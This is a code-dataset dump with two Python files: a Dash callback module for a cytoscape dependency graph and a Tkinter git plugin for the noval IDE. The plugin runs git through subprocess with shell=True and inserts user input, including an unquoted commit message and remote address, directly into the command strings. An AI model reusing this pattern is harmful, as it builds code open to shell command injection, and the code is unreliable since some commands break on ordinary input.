code stringlengths 2k 1.04M | repo_path stringlengths 5 517 | parsed_code stringlengths 0 1.04M | quality_prob float64 0.02 0.95 | learning_prob float64 0.02 0.93 |
|---|---|---|---|---|
import datetime as dt
from typing import Any, Dict, List, Tuple
import dash
import google.protobuf.json_format as json_format
from dash.dependencies import ALL, Input, Output, State
from dash.exceptions import PreventUpdate
from graph_structures_pb2 import SLI
from .. import (
compute_status,
constants,
converters,
id_constants,
state,
transformers,
utils,
)
from ..dash_app import app
@app.callback(
Output(id_constants.CYTOSCAPE_GRAPH, "elements"),
[
Input(id_constants.SIGNAL_SLI_REFRESH, "children"),
Input({id_constants.USER_JOURNEY_DATATABLE: ALL}, "selected_row_ids"),
Input(id_constants.SIGNAL_VIRTUAL_NODE_UPDATE, "children"),
Input({id_constants.OVERRIDE_DROPDOWN: ALL}, "value"),
Input(id_constants.SIGNAL_COMPOSITE_TAGGING_UPDATE, "children"),
Input(id_constants.CHANGE_OVER_TIME_SLI_STORE, "data"),
],
[
State(id_constants.CYTOSCAPE_GRAPH, "elements"),
State(id_constants.CYTOSCAPE_GRAPH, "selectedNodeData"),
State(id_constants.CYTOSCAPE_GRAPH, "tapNode"),
State(id_constants.VIEW_STORE, "data"),
],
)
def update_graph_elements(
# Input
sli_refresh_signal: str,
user_journey_table_selected_row_ids: List[str],
virtual_node_update_signal: str,
override_dropdown_value: int,
composite_tagging_update_signal: str,
change_over_time_data: Dict[str, Any],
# State
state_elements: List[Dict[str, Any]],
selected_node_data: List[Dict[str, Any]],
tap_node: Dict[str, Any],
view_list: List[Tuple[str, str]],
):
"""Update the elements of the cytoscape graph.
This function is called:
on startup to generate the graph
when the refresh button is clicked to regenerate the graph
when row is selected in the User Journey Datatable to highlight the User Journey edges through the path
when a virtual node is updated (via the SIGNAL_VIRTUAL_NODE_UPDATE)
when a tag, style, or view is updated.
We need this callback to handle these (generally unrelated) situations because Dash only supports assigning
a single callback to a given output element.
Args:
sli_refresh_signal: Signal indicating SLIs should be refreshed.
Value holds the trigger source id (REFRESH_SLI_BUTTON or REFRESH_SLI_INTERVAL)
user_journey_table_selected_row_ids: List of selected row ids from the user journey datatable.
Should contain only one element. Used for highlighting a path through the graph.
virtual_node_update_signal: String used as a signal to indicate that the virtual node addition/deletion was valid.
override_dropdown_value: Status enum value of the status to override for the node.
change_over_time_data: Either an empty dictionary, or a dictionary with keys
"start_timestamp" mapped to a float POSIX timestamp,
"end_timestamp" mapped to a float POSIX timestamp, and
"dict_slis" mapped to a list of SLIs represented as dictionaries.
The SLIs as dictionaries need to be parsed by the json_format module.
Used to apply styles for the Change Over Time feature.
state_elements: The list of current cytoscape graph elements.
selected_node_data: The list of data dictionaries for selected nodes.
Used to create virtual nodes.
tap_node: The cytoscape element of the latest tapped node.
Used to check which node to override the status of.
view_list: The current list of views (specific to each browser).
Returns:
A dictionary of cytoscape elements describing the nodes and edges of the graph.
"""
ctx = dash.callback_context
triggered_id, triggered_prop, triggered_value = utils.ctx_triggered_info(ctx)
# print("updating elements:", ctx.triggered) # DEBUG_REMOVE
if (
triggered_id == id_constants.SIGNAL_VIRTUAL_NODE_UPDATE
and triggered_value != constants.OK_SIGNAL
) or (
triggered_id
== f"""{{"{id_constants.OVERRIDE_DROPDOWN}":"{id_constants.OVERRIDE_DROPDOWN_HIDDEN}"}}"""
):
# No-op if :
# the validation signal isn't OK
# callback fired from dummy override dropdown
raise PreventUpdate
node_name_message_map, client_name_message_map = state.get_message_maps()
virtual_node_map = state.get_virtual_node_map()
elements = state.get_cytoscape_elements()
# This condition determines if we need to recompute node statuses.
if triggered_id in [
None, # initial call
id_constants.SIGNAL_SLI_REFRESH,
id_constants.SIGNAL_VIRTUAL_NODE_UPDATE,
f"""{{"{id_constants.OVERRIDE_DROPDOWN}":"{id_constants.OVERRIDE_DROPDOWN}"}}""", # Dash provides the value as a stringified dict
]:
if triggered_id == id_constants.SIGNAL_SLI_REFRESH:
if sli_refresh_signal == id_constants.REFRESH_SLI_BUTTON:
state.clear_sli_cache()
sli_list = state.get_slis()
node_name_message_map = transformers.apply_slis_to_node_map(
sli_list, node_name_message_map
)
if (
triggered_id
== f"""{{"{id_constants.OVERRIDE_DROPDOWN}":"{id_constants.OVERRIDE_DROPDOWN}"}}"""
):
node_name = tap_node["data"]["ujt_id"]
state.set_node_override_status(
node_name,
triggered_value, # type: ignore
node_name_message_map=node_name_message_map,
virtual_node_map=virtual_node_map,
)
# Perform status computation.
# We can refactor this block later as well, but no other function should call it...
compute_status.reset_node_statuses(node_name_message_map)
compute_status.reset_client_statuses(client_name_message_map)
compute_status.reset_node_statuses(virtual_node_map)
# combine the two maps of nodes into one dictionary
# use duck typing -- is this pythonic or a hack?
all_nodes_map = {**node_name_message_map, **virtual_node_map} # type: ignore
compute_status.compute_statuses(
all_nodes_map,
client_name_message_map,
)
state.set_node_name_message_map(node_name_message_map)
state.set_client_name_message_map(client_name_message_map)
state.set_virtual_node_map(virtual_node_map)
# For simplicity, we always perform all graph (view) transformations.
# This greatly simplifies the implementation each individual transformation, since each step doesn't
# need to account for changes introduced each subsequent step.
# However, this isn't the most efficient approach.
elements = transformers.apply_virtual_nodes_to_elements(elements)
# user_journey_table_selected_row_ids == [] when the user journey datatable isn't created yet
# it equals [None] when the datatable is created but no row is selected
if user_journey_table_selected_row_ids not in [[], [None]]:
active_user_journey_name = user_journey_table_selected_row_ids[0][0]
elements = transformers.apply_highlighted_edge_class_to_elements(
elements, active_user_journey_name
)
if change_over_time_data == {}:
# The following calls to apply classes to elements, which are then matched to styles
elements = transformers.apply_node_property_classes(
elements,
node_name_message_map,
client_name_message_map,
virtual_node_map,
)
tag_map = state.get_tag_map()
elements = transformers.apply_view_classes(
elements,
tag_map,
view_list,
)
else:
start_time = dt.datetime.fromtimestamp(change_over_time_data["start_timestamp"])
end_time = dt.datetime.fromtimestamp(change_over_time_data["end_timestamp"])
dict_slis = change_over_time_data["dict_slis"]
slis = [json_format.ParseDict(dict_sli, SLI()) for dict_sli in dict_slis]
elements = transformers.apply_change_over_time_classes(
elements,
slis,
start_time,
end_time,
)
# print(elements) # DEBUG_REMOVE
# Determine if we need to generate a new UUID. This minimizes the choppyness of the animation.
if triggered_id in [None, id_constants.SIGNAL_VIRTUAL_NODE_UPDATE]:
uuid = None
else:
uuid = utils.get_existing_uuid(state_elements)
# Workaround for https://github.com/plotly/dash-cytoscape/issues/106
# Give new ids to Cytoscape to avoid immutability of edges and parent relationships.
elements = transformers.apply_uuid_to_elements(elements, uuid_to_apply=uuid)
elements = transformers.sort_nodes_by_parent_relationship(elements)
return elements
@app.callback(
Output(id_constants.CYTOSCAPE_GRAPH, "stylesheet"),
Input(id_constants.SIGNAL_STYLE_UPDATE, "children"),
)
def update_cytoscape_stylesheet(style_update_signal):
"""Updates the cytoscape stylesheet.
This function is called:
when a style is updated.
Args:
style_update_signal: Signal indicating a style was updated.
Returns:
A dictionary encoding a cytoscape format stylesheet.
"""
style_map = state.get_style_map()
stylesheet = [
*constants.BASE_CYTO_STYLESHEET,
*converters.cytoscape_stylesheet_from_style_map(style_map),
]
return stylesheet | ujt/callbacks/graph_callbacks.py | import datetime as dt
from typing import Any, Dict, List, Tuple
import dash
import google.protobuf.json_format as json_format
from dash.dependencies import ALL, Input, Output, State
from dash.exceptions import PreventUpdate
from graph_structures_pb2 import SLI
from .. import (
compute_status,
constants,
converters,
id_constants,
state,
transformers,
utils,
)
from ..dash_app import app
@app.callback(
Output(id_constants.CYTOSCAPE_GRAPH, "elements"),
[
Input(id_constants.SIGNAL_SLI_REFRESH, "children"),
Input({id_constants.USER_JOURNEY_DATATABLE: ALL}, "selected_row_ids"),
Input(id_constants.SIGNAL_VIRTUAL_NODE_UPDATE, "children"),
Input({id_constants.OVERRIDE_DROPDOWN: ALL}, "value"),
Input(id_constants.SIGNAL_COMPOSITE_TAGGING_UPDATE, "children"),
Input(id_constants.CHANGE_OVER_TIME_SLI_STORE, "data"),
],
[
State(id_constants.CYTOSCAPE_GRAPH, "elements"),
State(id_constants.CYTOSCAPE_GRAPH, "selectedNodeData"),
State(id_constants.CYTOSCAPE_GRAPH, "tapNode"),
State(id_constants.VIEW_STORE, "data"),
],
)
def update_graph_elements(
# Input
sli_refresh_signal: str,
user_journey_table_selected_row_ids: List[str],
virtual_node_update_signal: str,
override_dropdown_value: int,
composite_tagging_update_signal: str,
change_over_time_data: Dict[str, Any],
# State
state_elements: List[Dict[str, Any]],
selected_node_data: List[Dict[str, Any]],
tap_node: Dict[str, Any],
view_list: List[Tuple[str, str]],
):
"""Update the elements of the cytoscape graph.
This function is called:
on startup to generate the graph
when the refresh button is clicked to regenerate the graph
when row is selected in the User Journey Datatable to highlight the User Journey edges through the path
when a virtual node is updated (via the SIGNAL_VIRTUAL_NODE_UPDATE)
when a tag, style, or view is updated.
We need this callback to handle these (generally unrelated) situations because Dash only supports assigning
a single callback to a given output element.
Args:
sli_refresh_signal: Signal indicating SLIs should be refreshed.
Value holds the trigger source id (REFRESH_SLI_BUTTON or REFRESH_SLI_INTERVAL)
user_journey_table_selected_row_ids: List of selected row ids from the user journey datatable.
Should contain only one element. Used for highlighting a path through the graph.
virtual_node_update_signal: String used as a signal to indicate that the virtual node addition/deletion was valid.
override_dropdown_value: Status enum value of the status to override for the node.
change_over_time_data: Either an empty dictionary, or a dictionary with keys
"start_timestamp" mapped to a float POSIX timestamp,
"end_timestamp" mapped to a float POSIX timestamp, and
"dict_slis" mapped to a list of SLIs represented as dictionaries.
The SLIs as dictionaries need to be parsed by the json_format module.
Used to apply styles for the Change Over Time feature.
state_elements: The list of current cytoscape graph elements.
selected_node_data: The list of data dictionaries for selected nodes.
Used to create virtual nodes.
tap_node: The cytoscape element of the latest tapped node.
Used to check which node to override the status of.
view_list: The current list of views (specific to each browser).
Returns:
A dictionary of cytoscape elements describing the nodes and edges of the graph.
"""
ctx = dash.callback_context
triggered_id, triggered_prop, triggered_value = utils.ctx_triggered_info(ctx)
# print("updating elements:", ctx.triggered) # DEBUG_REMOVE
if (
triggered_id == id_constants.SIGNAL_VIRTUAL_NODE_UPDATE
and triggered_value != constants.OK_SIGNAL
) or (
triggered_id
== f"""{{"{id_constants.OVERRIDE_DROPDOWN}":"{id_constants.OVERRIDE_DROPDOWN_HIDDEN}"}}"""
):
# No-op if :
# the validation signal isn't OK
# callback fired from dummy override dropdown
raise PreventUpdate
node_name_message_map, client_name_message_map = state.get_message_maps()
virtual_node_map = state.get_virtual_node_map()
elements = state.get_cytoscape_elements()
# This condition determines if we need to recompute node statuses.
if triggered_id in [
None, # initial call
id_constants.SIGNAL_SLI_REFRESH,
id_constants.SIGNAL_VIRTUAL_NODE_UPDATE,
f"""{{"{id_constants.OVERRIDE_DROPDOWN}":"{id_constants.OVERRIDE_DROPDOWN}"}}""", # Dash provides the value as a stringified dict
]:
if triggered_id == id_constants.SIGNAL_SLI_REFRESH:
if sli_refresh_signal == id_constants.REFRESH_SLI_BUTTON:
state.clear_sli_cache()
sli_list = state.get_slis()
node_name_message_map = transformers.apply_slis_to_node_map(
sli_list, node_name_message_map
)
if (
triggered_id
== f"""{{"{id_constants.OVERRIDE_DROPDOWN}":"{id_constants.OVERRIDE_DROPDOWN}"}}"""
):
node_name = tap_node["data"]["ujt_id"]
state.set_node_override_status(
node_name,
triggered_value, # type: ignore
node_name_message_map=node_name_message_map,
virtual_node_map=virtual_node_map,
)
# Perform status computation.
# We can refactor this block later as well, but no other function should call it...
compute_status.reset_node_statuses(node_name_message_map)
compute_status.reset_client_statuses(client_name_message_map)
compute_status.reset_node_statuses(virtual_node_map)
# combine the two maps of nodes into one dictionary
# use duck typing -- is this pythonic or a hack?
all_nodes_map = {**node_name_message_map, **virtual_node_map} # type: ignore
compute_status.compute_statuses(
all_nodes_map,
client_name_message_map,
)
state.set_node_name_message_map(node_name_message_map)
state.set_client_name_message_map(client_name_message_map)
state.set_virtual_node_map(virtual_node_map)
# For simplicity, we always perform all graph (view) transformations.
# This greatly simplifies the implementation each individual transformation, since each step doesn't
# need to account for changes introduced each subsequent step.
# However, this isn't the most efficient approach.
elements = transformers.apply_virtual_nodes_to_elements(elements)
# user_journey_table_selected_row_ids == [] when the user journey datatable isn't created yet
# it equals [None] when the datatable is created but no row is selected
if user_journey_table_selected_row_ids not in [[], [None]]:
active_user_journey_name = user_journey_table_selected_row_ids[0][0]
elements = transformers.apply_highlighted_edge_class_to_elements(
elements, active_user_journey_name
)
if change_over_time_data == {}:
# The following calls to apply classes to elements, which are then matched to styles
elements = transformers.apply_node_property_classes(
elements,
node_name_message_map,
client_name_message_map,
virtual_node_map,
)
tag_map = state.get_tag_map()
elements = transformers.apply_view_classes(
elements,
tag_map,
view_list,
)
else:
start_time = dt.datetime.fromtimestamp(change_over_time_data["start_timestamp"])
end_time = dt.datetime.fromtimestamp(change_over_time_data["end_timestamp"])
dict_slis = change_over_time_data["dict_slis"]
slis = [json_format.ParseDict(dict_sli, SLI()) for dict_sli in dict_slis]
elements = transformers.apply_change_over_time_classes(
elements,
slis,
start_time,
end_time,
)
# print(elements) # DEBUG_REMOVE
# Determine if we need to generate a new UUID. This minimizes the choppyness of the animation.
if triggered_id in [None, id_constants.SIGNAL_VIRTUAL_NODE_UPDATE]:
uuid = None
else:
uuid = utils.get_existing_uuid(state_elements)
# Workaround for https://github.com/plotly/dash-cytoscape/issues/106
# Give new ids to Cytoscape to avoid immutability of edges and parent relationships.
elements = transformers.apply_uuid_to_elements(elements, uuid_to_apply=uuid)
elements = transformers.sort_nodes_by_parent_relationship(elements)
return elements
@app.callback(
Output(id_constants.CYTOSCAPE_GRAPH, "stylesheet"),
Input(id_constants.SIGNAL_STYLE_UPDATE, "children"),
)
def update_cytoscape_stylesheet(style_update_signal):
"""Updates the cytoscape stylesheet.
This function is called:
when a style is updated.
Args:
style_update_signal: Signal indicating a style was updated.
Returns:
A dictionary encoding a cytoscape format stylesheet.
"""
style_map = state.get_style_map()
stylesheet = [
*constants.BASE_CYTO_STYLESHEET,
*converters.cytoscape_stylesheet_from_style_map(style_map),
]
return stylesheet | 0.705379 | 0.317625 |
from noval import _,GetApp,NewId
import os
import noval.iface as iface
import noval.plugin as plugin
import noval.util.utils as utils
import noval.constants as constants
from noval.project.templatemanager import ProjectTemplateManager
import gittool.gitui as gitui
import noval.consts as consts
import noval.menu as tkmenu
import subprocess
import noval.util.strutils as strutils
from tkinter import messagebox
import noval.ui_base as ui_base
import noval.ttkwidgets.checklistbox as checklistbox
import noval.ttkwidgets.treeviewframe as treeviewframe
import tkinter as tk
import noval.editor.text as texteditor
import noval.ttkwidgets.textframe as textframe
from tkinter import ttk,messagebox
import copy
class RepositoryAddrDialog(ui_base.CommonModaldialog):
def __init__(self,master,face_ui):
ui_base.CommonModaldialog.__init__(self,master)
self.title(_('Set repository remote addr'))
self.ui = face_ui
row = ttk.Frame(self.main_frame)
row.columnconfigure(1,weight=1)
ttk.Label(row,text=_('Repository addr:')).grid(column=0, row=0, sticky="nsew",padx=(0,consts.DEFAUT_CONTRL_PAD_X),pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
self.addr_var = tk.StringVar(value=self.GetRepositoryAddr())
name_entry = ttk.Entry(row,textvariable=self.addr_var)
name_entry.grid(column=1, row=0, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
row.pack(fill="x",expand=1)
self.AddokcancelButton()
def GetRepositoryAddr(self):
output = utils.GetCommandOutput("git remote -v",cwd=self.ui.GetProjectDocument().GetPath())
addr = ''
for line in output.splitlines():
if line.find('(push)') != -1:
addr = line.replace('(push)',"").replace('origin',"").strip()
return addr
def _ok(self,event=None):
if self.addr_var.get().strip() == "":
messagebox.showinfo(self,_('Please set repository addr'))
return
command = "git remote add origin %s"%(self.addr_var.get())
self.ui.CallGitProcess(command)
ui_base.CommonModaldialog._ok(self,event)
class GitConfigurationDialog(ui_base.CommonModaldialog):
def __init__(self,master,face_ui):
ui_base.CommonModaldialog.__init__(self,master)
self.ui = face_ui
self.title(_('Git Global Configuration'))
sizer_frame = ttk.Frame(self.main_frame)
sizer_frame.pack(fill="both",expand=1)
sizer_frame.columnconfigure(1,weight=1)
configs = {}
self.GetConfigs(configs)
ttk.Label(sizer_frame,text=_('User name:')).grid(column=0, row=0, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=(consts.DEFAUT_CONTRL_PAD_X,0))
self.user_name_var = tk.StringVar(value=configs['user_name'])
user_name_entry = ttk.Entry(sizer_frame,textvariable=self.user_name_var)
user_name_entry.grid(column=1, row=0, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=consts.DEFAUT_CONTRL_PAD_X)
ttk.Label(sizer_frame,text=_('User email:')).grid(column=0, row=1, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=(consts.DEFAUT_CONTRL_PAD_X,0))
self.user_email_var = tk.StringVar(value=configs['user_email'])
user_email_entry = ttk.Entry(sizer_frame,textvariable=self.user_email_var)
user_email_entry.grid(column=1, row=1, sticky="nsew",pady=(consts.DEFAUT_CONTRL_PAD_Y,0),padx=consts.DEFAUT_CONTRL_PAD_X)
self.AddokcancelButton()
self.quote_path_var = tk.BooleanVar(value=configs.get('quotepath',True))
ttk.Checkbutton(sizer_frame,text=("Use Quote Path"),variable=self.quote_path_var).grid(column=0, row=2, sticky="nsew",padx=(consts.DEFAUT_CONTRL_PAD_X,0),pady=(consts.DEFAUT_CONTRL_PAD_Y,0))
self.golbal_chk_var = tk.BooleanVar(value=True)
ttk.Checkbutton(sizer_frame,text=("Apply to global domain"),variable=self.golbal_chk_var).grid(column=0, row=3, sticky="nsew",padx=(consts.DEFAUT_CONTRL_PAD_X,0))
def _ok(self,event=None):
if self.user_name_var.get().strip() == "":
messagebox.showinfo(self,_('Please set git user name'))
return
if self.user_email_var.get().strip() == "":
messagebox.showinfo(self,_('Please set git user email'))
return
command = "git config "
if self.golbal_chk_var.get():
command += "--global "
command += "user.name \"%s\""%self.user_name_var.get()
self.ui.CallGitProcess(command)
command = "git config "
if self.golbal_chk_var.get():
command += "--global "
command += "user.email \"%s\""%self.user_email_var.get()
self.ui.CallGitProcess(command)
if self.quote_path_var.get():
quote_path = "true"
else:
quote_path = "false"
self.ui.CallGitProcess('git config --global core.quotepath %s'%quote_path)
ui_base.CommonModaldialog._ok(self,event)
def GetConfigs(self,configs = {}):
output = utils.GetCommandOutput("git config -l")
for line in output.splitlines():
if line.find('user.name') != -1:
user_name = line.replace('user.name=',"").strip()
configs['user_name'] = user_name
elif line.find('user.email') != -1:
user_email = line.replace('user.email=',"").strip()
configs['user_email'] = user_email
elif line.find('core.quotepath') != -1:
quotepath = line.replace('core.quotepath=',"").strip()
configs['quotepath'] = True if quotepath=="true" else False
class CommitDialog(ui_base.CommonModaldialog):
def __init__(self,master,branch,content,single_file=False,commit=True):
ui_base.CommonModaldialog.__init__(self,master,width=1000)
if commit:
self.title(_('Commit-[%s]'%branch))
else:
self.title(_('Checkout-[%s]'%branch))
commit_file_label = ttk.Label(self.main_frame)
commit_file_label.pack(fill="x")
check_listbox_view = treeviewframe.TreeViewFrame(self.main_frame,treeview_class=checklistbox.CheckListbox,borderwidth=1,relief="solid",height=10)
self.listbox = check_listbox_view.tree
check_listbox_view.pack(fill="x",expand=1)
sizer_frame = ttk.Frame(self.main_frame)
sizer_frame.pack(fill="x",expand=1)
select_all_btn = ttk.Button(
sizer_frame, text=_("Select All"), command=self.SelectAll
)
select_all_btn.grid(column=0, row=0, sticky="nsew",padx=(consts.DEFAUT_CONTRL_PAD_X,0),pady=(consts.DEFAUT_CONTRL_PAD_Y, 0))
unselect_all_btn = ttk.Button(
sizer_frame, text=_("UnSelect All"), command=self.UnselectAll
)
unselect_all_btn.grid(column=1, row=0, sticky="nsew",padx=(consts.DEFAUT_CONTRL_PAD_X,0),pady=(consts.DEFAUT_CONTRL_PAD_Y, 0))
modify_flag = 'modified:'
delete_flag = 'deleted:'
unstaged_file = False
self.is_commit = commit
commit_file_count = 0
unstaged_file_count = 0
encoding = utils.get_default_encoding()
if not single_file:
for line in content.splitlines():
try:
line = line.encode(encoding,'ignore').decode('utf-8')
except:
line = line
if line.find(modify_flag) != -1:
i = self.listbox.Append(line.replace(modify_flag,"").strip())
self.listbox.Check(i)
commit_file_count += 1
elif line.find(delete_flag) != -1:
i = self.listbox.Append(line.replace(delete_flag,"").strip())
self.listbox.Check(i)
commit_file_count += 1
elif line.find('Untracked files:') != -1:
unstaged_file = True
elif unstaged_file and line.find('git add <file>...') == -1 and line.find('no changes added to commit') == -1 and line.find('nothing added to commit') == -1 and commit:
if line.strip():
self.listbox.Append(line.strip())
unstaged_file_count += 1
else:
i = self.listbox.Append(content)
self.listbox.Check(i)
commit_file_count += 1
if self.is_commit:
commit_file_label.configure(text=_('Commit files %d,Unstaged files %d')%(commit_file_count,unstaged_file_count))
ttk.Label(self.main_frame,text=_('Commit message')).pack(fill="x")
text_frame = textframe.TextFrame(self.main_frame,borderwidth=1,relief="solid",text_class=texteditor.TextCtrl,height=12)
text_frame.pack(fill="x",expand=1)
self.text = text_frame.text
ttk.Button(self.main_frame, text=_("Commit and Push"), command=self.CommitAndPush).pack(side=tk.LEFT)
self.AddokcancelButton(side=tk.LEFT)
self.ok_button.configure(text=_('Commit'),default="active")
else:
commit_file_label.configure(text=_('Commit files %d')%(commit_file_count))
self.AddokcancelButton()
self.ok_button.configure(text=_('Checkout'),default="active")
self.files = []
self.msg = ''
self.push = False
def SelectAll(self):
self.CheckListbox(True)
def CheckListbox(self,check=True):
for i in range(self.listbox.GetCount()):
self.listbox.Check(i,check)
def UnselectAll(self):
self.CheckListbox(False)
def CommitAndPush(self):
self.push = True
self._ok()
def GetFiles(self):
files = []
for i in range(self.listbox.GetCount()):
if self.listbox.IsChecked(i):
files.append(self.listbox.GetString(i))
return files
def _ok(self,event=None):
self.files = self.GetFiles()
if 0 == len(self.files):
messagebox.showinfo(self,_('Please select at least one file'))
return
if self.is_commit:
self.msg = self.text.GetValue()
if self.msg.strip() == '':
messagebox.showinfo(self,_('commit message could not be empty'))
return
ui_base.CommonModaldialog._ok(self,event)
class GitToolPlugin(plugin.Plugin):
"""plugin description here..."""
plugin.Implements(iface.MainWindowI)
MAX_COMMAND_LINE_LENGTH = 10000
def PlugIt(self, parent):
"""Hook the calculator into the menu and bind the event"""
utils.get_logger().info("Installing GitTool plugin")
ProjectTemplateManager().AddProjectTemplate("General",_("New Project From Git Server"),[(gitui.GitProjectNameLocationPage,{'project_dir_checked':False,'enable_create_project_dir':False}),gitui.LocationSelectionPage,gitui.RepositorySourcePage,\
gitui.BranchSelectionPage,gitui.LocalDestinationPage,gitui.ImportGitfilesPage])
GetApp().bind(constants.PROJECTVIEW_POPUP_FILE_MENU_EVT, self.AppenFileMenu,True)
GetApp().bind(constants.PROJECTVIEW_POPUP_ROOT_MENU_EVT, self.AppenRootMenu,True)
self.project_browser = GetApp().MainFrame.GetView(consts.PROJECT_VIEW_NAME)
GetApp().AddMessageCatalog('gittool', __name__)
self.current_branch = None
def GetMinVersion(self):
"""Override in subclasses to return the minimum version of novalide that
the plugin is compatible with. By default it will return the current
version of novalide.
@return: version str
"""
return "1.2.2"
def InstallHook(self):
"""Override in subclasses to allow the plugin to be loaded
dynamically.
@return: None
"""
pass
def UninstallHook(self):
pass
def EnableHook(self):
pass
def DisableHook(self):
pass
def GetFree(self):
return True
def GetPrice(self):
pass
def MatchPlatform(self):
'''
这里插件需要区分windows版本和linux版本
windows版本把adkpass.exe包需要打包进去
linux版本把可执行脚本adkpass.py包需要打包进去
'''
return True
def AppenRootMenu(self, event):
self.current_branch = self.GetBranch()
print ('current branch is ',self.current_branch)
menu = event.get('menu')
submenu = tkmenu.PopupMenu()
menu.AppendMenu(NewId(),_("Version Control"),submenu)
if self.current_branch is None:
submenu.Append(NewId(),_("Init"),handler=self.Init)
else:
submenu.Append(NewId(),_("Checkout files"),handler=self.CheckoutCommitFiles)
submenu.Append(NewId(),_("Ignore files"),handler=self.AddIgnoreFiles)
submenu.Append(NewId(),_("Pull"),handler=self.Pull)
submenu.Append(NewId(),_("Commit"),handler=self.Commit)
submenu.Append(NewId(),_("Push"),handler=self.Push)
branch_menu = tkmenu.PopupMenu()
submenu.AppendMenu(NewId(),_("Branch"),branch_menu)
branch_menu.Append(NewId(),_("Checkout branch"),handler=self.CheckoutBranch)
branch_menu.Append(NewId(),_("New branch"),handler=self.NewBranch)
branch_menu.Append(NewId(),_("Delete branch"),handler=self.NewBranch)
remote_menu = tkmenu.PopupMenu()
submenu.AppendMenu(NewId(),_("Remote"),remote_menu)
remote_menu.Append(NewId(),_("Set Remote Url"),handler=self.SetRemoteUrl)
submenu.Append(NewId(),_("Configuration"),handler=self.Configuration)
def SetRemoteUrl(self):
RepositoryAddrDialog(GetApp().MainFrame,self).ShowModal()
def Configuration(self):
GitConfigurationDialog(GetApp().MainFrame,self).ShowModal()
def Init(self):
command = "git init"
error,output,returncode = self.CallGitProcess(command)
def CheckoutBranch(self):
pass
def GetCommandOutput(self,command):
output = utils.GetCommandOutput('git status',cwd=self.GetProjectDocument().GetPath())
if output == '':
output = utils.GetCommandOutput('git status',cwd=self.GetProjectDocument().GetPath(),encoding='utf-8')
return output
def CheckoutCommitFiles(self):
output = self.GetCommandOutput('git status')
dlg = CommitDialog(GetApp().MainFrame,self.current_branch,output,commit=False)
if dlg.ShowModal() == constants.ID_CANCEL:
return
self.Checkoutfiles(dlg.files)
def AddIgnoreFiles(self):
pass
def NewBranch(self):
pass
def Pull(self):
command = "git pull"
error,output,returncode = self.CallGitProcess(command)
if returncode == 0:
messagebox.showinfo(GetApp().GetAppName(),_('pull success'))
else:
messagebox.showinfo(_('Error'),_('pull fail:%s')%(error))
def Push(self):
error,output,returncode = self.CallGitProcess("git push origin %s"%self.current_branch,ask_pass=True)
if returncode != 0:
messagebox.showerror(_('Push fail'),error)
return
messagebox.showinfo(GetApp().GetAppName(),_('Push success'))
def Commit(self):
output = self.GetCommandOutput('git status')
dlg = CommitDialog(GetApp().MainFrame,self.current_branch,output)
if dlg.ShowModal() == constants.ID_CANCEL:
return
files = dlg.files
command = 'git add'
for commit_file in files:
command += ' ' + commit_file
error,output,returncode = self.CallGitProcess(command)
if returncode != 0:
messagebox.showerror(_('Commit fail'),error)
return
command = 'git commit -m %s'%dlg.msg
error,output,returncode = self.CallGitProcess(command)
if returncode != 0:
messagebox.showerror(_('Commit fail'),error)
return
if dlg.push:
self.Push()
else:
messagebox.showinfo(GetApp().GetAppName(),_('Commit success'))
def AppenFileMenu(self, event):
self.current_branch = self.GetBranch()
menu = event.get('menu')
tree_item = event.get('item')
project_browser = self.GetProjectFrame()
filePath = project_browser.GetView()._GetItemFilePath(tree_item)
submenu = tkmenu.PopupMenu()
menu.AppendMenu(NewId(),_("Version Control"),submenu)
submenu.Append(NewId(),_("Commit"),handler=lambda:self.Commitfile(filePath))
submenu.Append(NewId(),_("Checkout"),handler=lambda:self.Checkoutfile(filePath))
submenu.Append(NewId(),_("Push"),handler=self.Pushfile)
submenu.Append(NewId(),_("Add to ignore"),handler=self.AddIgnoreFile)
submenu.Append(NewId(),_("Add"),handler=lambda:self.AddFile(filePath))
submenu.Append(NewId(),_("Remove"),handler=lambda:self.RemoveFile(filePath))
submenu.Append(NewId(),_("Delete"),handler=lambda:self.DeleteFile(filePath))
def Checkoutfile(self,filepath):
self.Checkoutfiles([filepath])
def Checkoutfiles(self,files):
ret = messagebox.askquestion(GetApp().GetAppName(),_('Checkout file will overwrite current file content,Are you sure to checkout?'))
if not ret:
return
for filepath in files:
error,output,returncode = self.CallGitProcess("git checkout %s"%strutils.emphasis_path(filepath))
if returncode == 0:
messagebox.showinfo(GetApp().GetAppName(),_('checkout success'))
else:
messagebox.showinfo(_('Error'),_('checkout fail:%s')%(error))
def AddIgnoreFile(self):
pass
def AddFile(self,filePath):
error,output,returncode = self.CallGitProcess("git add %s"%strutils.emphasis_path(filePath))
if returncode == 0:
messagebox.showinfo(GetApp().GetAppName(),_('add success'))
else:
messagebox.showinfo(_('Error'),_('add fail:%s')%(error))
return returncode
def RemoveFile(self,filePath):
self.GetProjectDocument().GetFirstView().RemoveFromProject()
def DeleteFile(self,filePath):
error,output,returncode = self.CallGitProcess('git rm %s'%strutils.emphasis_path(filePath))
if returncode == 0:
messagebox.showinfo(GetApp().GetAppName(),_('delete success'))
else:
messagebox.showinfo(_('Error'),_('delete fail:%s')%(error))
return
self.RemoveFile(filePath)
def Commitfile(self,filePath):
dlg = CommitDialog(GetApp().MainFrame,self.current_branch,filePath,single_file=True)
if dlg.ShowModal() == constants.ID_CANCEL:
return
returncode = self.AddFile(filePath)
if returncode != 0:
return
command = 'git commit -m %s'%dlg.msg
error,output,returncode = self.CallGitProcess(command)
if returncode != 0:
messagebox.showerror(_('Commit fail'),error)
return
else:
messagebox.showinfo(GetApp().GetAppName(),_('commit success'))
def Pushfile(self):
self.Push()
def CallGitProcess(self,command,ask_pass=False):
utils.get_logger().debug('git command is %s,length is:%d',command,len(command))
if len(command) >= self.MAX_COMMAND_LINE_LENGTH:
return "command line length exceed limit....","",-1
env = copy.copy(os.environ)
if ask_pass:
ask_pass_path = gitui.GetAskPassPath()
env.update(dict(GIT_ASKPASS=ask_pass_path))
p = subprocess.Popen(command,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,\
cwd=self.GetProjectDocument().GetPath(),env=env)
error = str(p.stderr.read(),encoding = utils.get_default_encoding())
try:
output = str(p.stdout.read(),encoding = utils.get_default_encoding())
except:
output = str(p.stdout.read(),encoding = 'utf-8')
p.wait()
return error,output,p.returncode
